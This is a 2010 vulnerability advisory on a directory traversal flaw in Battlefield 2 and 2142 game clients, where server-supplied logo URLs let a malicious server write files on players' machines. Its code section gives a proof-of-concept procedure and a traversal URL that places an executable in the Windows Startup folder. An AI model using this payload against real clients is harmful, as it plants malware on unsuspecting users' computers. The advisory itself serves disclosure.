#######################################################################
Luigi Auriemma
Application: Refractor 2 engine
Games: Battlefield 2 <= 1.50 (aka 1.5.3153-802.0)
http://www.battlefield.ea.com/battlefield/bf2/
Battlefield 2142 <= 1.50 (aka 1.10.48.0)
http://battlefield.ea.com/battlefield/bf2142/
...
other games developed with the same engine could be
vulnerable like Battlefield Heroes
Platforms: Windows
Bug: client URLs directory traversal
Exploitation: remote, versus clients
Date: 29 Jun 2010
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
The Battlefield series is one of the most famous and played series of
games deeply devoted to multiplayer gaming.
The series is developed by DICE (http://www.dice.se) and published by
Electronic Arts.
#######################################################################
======
2) Bug
======
Each BF2 and BF2142 server has some fields where the admin can specify
the links to files and images like the sponsor and community logo.
The sponsor logo is visible immediately when the client gets the list
of servers and selects the server with the mouse (one-click, not join)
while the second one is loaded when the client joins that server.
Exist also other URLs like DemoDownloadURL, DemoIndexURL and
CustomMapsURL that can be exploited when the client joins the malicious
server.
The client performs a very simple operation, it gets the URL and
downloads the file saving it locally using its original name in the
following folder:
C:\Documents and Settings\USER\My Documents\Battlefield 2\LogoCache\SERVER
C:\Documents and Settings\USER\My Documents\Battlefield 2142\LogoCache\SERVER
where USER is the Windows account of the current user and SERVER is the
address of the web server, while LogoCache could be HttpCache if are
used the URLs for downloading demos and maps.
The vulnerability resides in the missing handling of the backslash char
with the consequence that the name of the file will include the
classical directory traversal pattern allowing a malicious server to
upload malicious executables on the clients.
Note that the loading of the URLs is automatic and doesn't seem
possible to disable this feature.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/onlywebs.zip
- launch: onlywebs.exe c:\malicious_file.exe
- start the server launcher using the following string as sponsor and
community logo URL:
http://SERVER/..\..\..\..\Start Menu\Programs\Startup\owned.exe
- Save and Start the server
- launch the client and go in the multiplayer menu
- when the refreshing of the list is terminated select or join the
malicious server
- now the file owned.exe will be available in the Startup folder of the
client and will be executed at the next login or reboot
note that the server could be not seen if you are running it on the
same machine of the client (127.0.0.1), in that case use another
computer/vm (a server or an UDP datapipe on port 29900)
#######################################################################
======
4) Fix
======
No fix.
#######################################################################